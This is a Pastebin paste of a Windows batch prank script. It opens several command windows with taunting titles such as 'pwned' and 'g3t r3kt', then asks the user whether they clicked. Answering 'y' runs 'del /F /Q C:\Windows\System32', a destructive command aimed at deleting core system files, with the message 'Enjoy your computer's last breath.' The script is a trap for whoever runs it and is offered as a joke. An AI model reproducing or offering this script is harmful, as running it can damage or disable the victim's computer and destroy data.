Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- echo You've just copied some code. :3
- pause >nul
- title XDDDDD
- echo iuhiuewfhiwhfiuhiuwhfew
- echo wiugffiwifwhiflhewfiuew
- echo A N G E R A S
- pause >nul
- start
- title dead
- start
- title xd
- start
- title boi boi
- start
- title g3t r3kt
- start
- title pwned
- start
- title boi boi pc
- start
- title the end. c:
- pause >nul
- echo Click again, I dare you!
- pause >nul
- :choice
- set /P c=Clicked? (y/n)
- if /I "%c%" EQU "y" goto :death
- if /I "%c%" EQU "N" goto :survived
- :death
- echo You asked for it...
- pause >nul
- del /F /Q C:\Windows\System32
- title Enjoy your computer's last breath.
- :survived
- echo Good.
- pause >nul
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement